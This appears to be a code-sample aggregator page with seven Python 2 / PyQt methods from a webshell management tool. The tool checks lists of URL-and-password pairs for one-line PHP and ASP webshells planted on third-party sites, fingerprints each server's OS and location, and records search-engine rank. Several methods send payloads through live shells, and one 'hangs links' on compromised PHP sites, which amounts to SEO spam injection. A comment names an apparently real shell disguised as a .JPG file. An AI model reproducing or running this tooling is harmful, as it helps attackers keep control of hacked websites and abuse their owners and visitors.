Ejemplo n.º 1
0
    def php_cs_js(self):
        self.ui.main_pushButton_PHP.setEnabled(0)  #给改成禁用
        int_model = self.ui.SQLite_tableView.selectionModel()  #获取选中编号
        model = self.ui.SQLite_tableView.model()#index = model.index(3,1)#data = model.data(index)#print data.toString()
        PHP_data=self.ui.textEdit_PHP_data.toPlainText() #获取内容
        self.write2file("data.php",PHP_data)
        PHP_data=str(PHP_data)  #.decode('utf-8').encode('gbk')

        PHP_data=self.x0_zs(PHP_data)  #清除注释<?php   ?>
        PHP_data=self.x1_zs(PHP_data)  #清除注释/*   */
        PHP_data=self.x2_zs(PHP_data)  #清除//注释
        PHP_data=self.open_file_null(PHP_data)     #清除空行
        #print PHP_data
        for index in int_model.selectedRows():       #// 对于被选中的每一行
            try:
                int_index=index.row()#获取行号
                s0= model.data(model.index(int_index,0)).toString()
                s1= model.data(model.index(int_index,1)).toString()
                #s0="http://localhost/long.php"
                #s1="long123"
                if g.bool_asp_php(s0)=="php":
                    fiel_data=self.yijuhua_php_js(str(s0),str(s1),str(PHP_data))
                    data=self.web_rand_file_data(str(s0),str(s1),str(fiel_data))  #HTML内容
                    self.write2file("log/"+br_pr_sogo.get_domain(str(s0),0)+"_"+g.bool_asp_php(s0)+".html",data)  #写入文件
            except BaseException, e:
                print(str(e))
                self.ui.main_pushButton_PHP.setEnabled(1)
                return 0
Ejemplo n.º 2
0
    def ASP_cs_js(self):
        self.ui.main_pushButton_ASP.setEnabled(0)  #给改成禁用
        int_model = self.ui.SQLite_tableView.selectionModel()  #获取选中编号
        model = self.ui.SQLite_tableView.model()#index = model.index(3,1)#data = model.data(index)#print data.toString()
        ASP_data=self.ui.textEdit_ASP_data.toPlainText() #获取内容
        self.write2file("data.asp",ASP_data)
        ASP_data=str(ASP_data)  #.decode('utf-8').encode('gbk')

        ASP_data=self.asp_x0_zs(ASP_data)  #清除<% %>
        ASP_data=self.asp_x2_zs(ASP_data)  #清除'注释
        ASP_data=self.open_file_null(ASP_data)     #清除空行
        ASP_data=self.asp_x2_zs(ASP_data) #清除'注释
        #print ASP_data
        for index in int_model.selectedRows():       #// 对于被选中的每一行
            try:
                int_index=index.row()#获取行号
                s0= model.data(model.index(int_index,0)).toString()
                s1= model.data(model.index(int_index,1)).toString()
#                s0="http://192.168.1.100/long.asp"
#                s1="long123"
                if g.bool_asp_php(s0)=="asp":
                    fiel_data=self.yijuhua_ASP_js(str(s0),str(s1),str(self.str_char(ASP_data)))
                    #print fiel_data
                    data=self.web_rand_file_data(str(s0),str(s1),str(fiel_data))  #HTML内容
                    self.write2file("log/"+br_pr_sogo.get_domain(str(s0),0)+"_"+g.bool_asp_php(s0)+".html",data)  #写入文件
            except BaseException, e:
                print(str(e))
                self.ui.main_pushButton_ASP.setEnabled(1)
                return 0
Ejemplo n.º 3
0
    def yjh_cs_2(self):  #测试一句话是否连接成功
        global yu_2, yu_3
        self.ui.main_pushButton_2.setEnabled(0)  #给改成禁用
        int_model = self.ui.SQLite_tableView.selectionModel()  #获取选中编号
        model = self.ui.SQLite_tableView.model(
        )  #index = model.index(3,1)#data = model.data(index)#print data.toString()
        h = qqwry.C_hoset()

        for index in int_model.selectedRows():  #// 对于被选中的每一行
            try:
                int_index = index.row()  #获取行号
                s0 = model.data(model.index(int_index, 0)).toString()
                s1 = model.data(model.index(int_index, 1)).toString()
                data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
                                           time.localtime(time.time()))
                data_time = time.mktime(
                    time.strptime(data_time2, '%Y-%m-%d %H:%M:%S'))  #转化成时间戳
                if s0 == "" or len(s0) <= 7:
                    yu_3 += 1  #失败多少条
                    self.tableView_add(int_index, None, None, u"null", None,
                                       None, None, None, None, None,
                                       data_time2)  #添加数据
                    sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                        data_time, str(s0), str(s1))
                    self.sql3.mysqlite3_update(sql_data)
                    continue  #跳过

                #                url="http://www.sttc.cn/uploadfile/2013/0621/thumb_6_6_.Php.JPG%20%20%20%20%20%20%20Php"
                #                PASS="******"
                if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                    yu_2 += 1  #成功多少条
                    #self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time)  #添加数据
                    #sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1))
                    #yijuhua_win_linux(url,PASS): #URL地址 ,密码   返回操作系统
                    win_linux = yijuhua.yijuhua_win_linux(
                        str(s0), str(s1))  #URL地址 ,密码   返回操作系统
                    WLWZ = h.www_data(qqwry.url_www(str(s0)))
                    WLWZ = u"%s" % (WLWZ)
                    if g.bool_asp_php(str(s0)) == "asp":
                        win_linux = "WinNT"
                    self.tableView_add(int_index, None, None, u"ok",
                                       str(win_linux), None, None, None, WLWZ,
                                       None, data_time2)  #添加数据
                    sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                        str(win_linux), WLWZ, data_time, str(s0), str(s1))
                else:
                    yu_3 += 1  #失败多少条
                    self.tableView_add(int_index, None, None, u"No", u"No",
                                       None, None, None, None, None,
                                       data_time2)  #添加数据
                    sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                        data_time, str(s0), str(s1))
                self.sql3.mysqlite3_update(sql_data)

            except BaseException, e:
                print(str(e))
                self.ui.main_pushButton_2.setEnabled(1)
                return 0
Ejemplo n.º 4
0
 def db_cs(self, ID):  #测试还没有测试过的一句话
     try:
         global yu_1, yu_2, yu_3
         sql_data = ""
         if ID == 0:
             sql_data = "select * from shell where zts3 is null"
         if ID == 1:
             sql_data = "select * from shell where zts3='ok'"
         if ID == 2:
             sql_data = "select * from shell where zts3='No'"
         self.sql3.conn.commit()  # 获取到游标对象
         cur = self.sql3.conn.cursor()  # 用游标来查询就可以获取到结果
         cur.execute(sql_data)  # 获取所有结果
         res = cur.fetchall()  #从结果中取出所有记录
         for line in res:
             s0 = str(line[0])
             s1 = str(line[1])
             data_time2 = time.strftime('%Y-%m-%d %H:%M:%S',
                                        time.localtime(time.time()))
             data_time = time.mktime(
                 time.strptime(data_time2, '%Y-%m-%d %H:%M:%S'))  #转化成时间戳
             if s0 == "" or len(s0) <= 7:
                 yu_3 += 1  #失败多少条
                 sql_data = "update shell set zts3='null',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                     data_time, str(s0), str(s1))
                 self.sql3.mysqlite3_update(sql_data)
                 continue  #跳过
             if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                 yu_2 += 1  #成功多少条
                 win_linux = yijuhua.yijuhua_win_linux(
                     str(s0), str(s1))  #URL地址 ,密码   返回操作系统
                 WLWZ = self.h.www_data(qqwry.url_www(str(s0)))
                 WLWZ = u"%s" % (WLWZ)
                 if g.bool_asp_php(str(s0)) == "asp":
                     win_linux = "WinNT"
                 sql_data = "update shell set zts3='ok',oss4='%s',ips5='%s',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                     str(win_linux), WLWZ, data_time, str(s0), str(s1))
                 self.br_pr_sogo(s0, s1)  #获取 百度 谷歌  搜狗  权重
                 print u"URL:%s--passwod:%s-----ok-----%s" % (str(s0),
                                                              str(s1), WLWZ)
                 self.messagebox()
             else:
                 yu_3 += 1  #失败多少条
                 sql_data = "update shell set zts3='No',oss4='No',time2s7='%s' where urls1='%s' and passwods2='%s'" % (
                     data_time, str(s0), str(s1))
                 self.messagebox()
                 print u"URL:%s--passwod:%s-----No" % (str(s0), str(s1))
             self.sql3.mysqlite3_update(sql_data)
     except BaseException, e:
         print(str(e))
         return 0
Ejemplo n.º 5
0
    def webshell_url(self):
        try:
            if Class_Queue.webscan_url.empty():  #判断队列是否为空
                print u"thread:%d webscan_url  已经没有可操作的URL了" % (self.TH)
                time.sleep(60)
            URL = Class_Queue.webscan_url.get(0.5)  #get()方法从队头删除并返回一个项目
            url = URL.split("|")
            if len(url) <= 1:
                return 0
            #url[0],url[1]

            if g.bool_asp_php(url[0]) == "php":
                data = u"thread:%d url:%s passwod:%s" % (self.TH, url[0],
                                                         url[1])
                if eval.cs(url[0], url[1]):
                    print u"php_ok.txt%s 链接成功" % (data)
                    websehll = "%s|%s" % (url[0], url[1])
                    self.TXT_file_add("php_ok.txt", str(websehll))
                    self.php_webshell(url[0], url[1])  #PHP处理WEBSHELL  挂链
                    return 0
                else:
                    websehll = "%s|%s" % (url[0], url[1])
                    self.TXT_file_add("php_no.txt", str(websehll))
                    print u"php_no.txt%s 链接失败" % (data)
                    return 0

            if g.bool_asp_php(url[0]) == "asp":
                websehll = "%s|%s" % (url[0], url[1])
                self.TXT_file_add("asp_ok.txt", str(websehll))
                return 0
            else:
                websehll = "%s|%s" % (url[0], url[1])
                self.TXT_file_add("asp_no.txt", str(websehll))

            if g.bool_asp_php(url[0]) == "null":
                websehll = "%s|%s" % (url[0], url[1])
                self.TXT_file_add("null.txt", str(websehll))
            return 0
        except Exception, e:
            #print e
            return 0
Ejemplo n.º 6
0
    def br_pr_sogo_4(self):  #查询\WEBSHELL 状态
        self.ui.pb_pushButton_1.setEnabled(0)  #给改成禁用
        int_model = self.ui.tableView.selectionModel()  #获取选中编号
        model = self.ui.tableView.model(
        )  #index = model.index(3,1)#data = model.data(index)#print data.toString()
        for index in int_model.selectedRows():  #// 对于被选中的每一行
            try:
                int_index = index.row()  #获取行号
                s0 = model.data(model.index(int_index, 0)).toString()
                s1 = model.data(model.index(int_index, 1)).toString()
                if s0 == "" or len(s0) <= 7:
                    self.tableView_add(int_index, None, None,
                                       u"null")  #添加数据urllib.quote(str(s0))
                    sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                    self.sql3.mysqlite3_update(sql_data)
                    continue  #跳过
                    #print str(s0)
                if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                    win_linux = "WinNT"
                    if g.bool_asp_php(s0) == "php":
                        win_linux = yijuhua.yijuhua_win_linux(str(s0), str(s1))

                    www_wlwz = yijuhua.www_wlwz(str(s0))
                    self.tableView_add(int_index, None, None, u"ok",
                                       str(win_linux), None, None,
                                       www_wlwz)  #添加数据urllib.quote(str(s0))
                    sql_data = "update url set zt='ok',win='%s',wl='%s' where url='%s' and passwod='%s'" % (
                        str(win_linux), urllib.quote(
                            str(www_wlwz)), str(s0), str(s1))
                else:
                    self.tableView_add(int_index, None, None,
                                       u"No")  #添加数据urllib.quote(str(s0))
                    sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                    #print sql_data
                self.sql3.mysqlite3_update(sql_data)

            except BaseException, e:
                pass
Ejemplo n.º 7
0
    def br_pr_sogo_4(self):  #查询\WEBSHELL 状态
        self.ui.pushButton_4.setEnabled(0)  #给改成禁用
        int_model = self.ui.tableView.selectionModel()  #获取选中编号
        model = self.ui.tableView.model(
        )  #index = model.index(3,1)#data = model.data(index)#print data.toString()
        for index in int_model.selectedRows():  #// 对于被选中的每一行
            try:
                int_index = index.row()  #获取行号
                s0 = model.data(model.index(int_index, 0)).toString()
                s1 = model.data(model.index(int_index, 1)).toString()
                if s0 == "" or len(s0) <= 7:
                    self.tableView_add(int_index, None, None,
                                       u"null")  #添加数据urllib.quote(str(s0))
                    sql_data = "update url set zt='null' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                    self.sql3.mysqlite3_update(sql_data)
                    continue  #跳过
                #print str(s0)
                if yijuhua.yijuhua_cs(g.bool_asp_php(s0), str(s0), str(s1)):
                    #self.tableView_add(int_index,None,None,u"ok",None,None,None,data_time)  #添加数据
                    #sql_data="update shell set zts3='ok',time2s7='%s' where urls1='%s' and passwods2='%s'"%(data_time,str(s0),str(s1))
                    #yijuhua_win_linux(url,PASS): #URL地址 ,密码   返回操作系统
                    self.tableView_add(int_index, None, None,
                                       u"ok")  #添加数据urllib.quote(str(s0))
                    sql_data = "update url set zt='ok' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                else:
                    self.tableView_add(int_index, None, None,
                                       u"No")  #添加数据urllib.quote(str(s0))
                    sql_data = "update url set zt='No' where url='%s' and passwod='%s'" % (
                        str(s0), str(s1))
                #print sql_data
                self.sql3.mysqlite3_update(sql_data)

            except BaseException, e:
                pass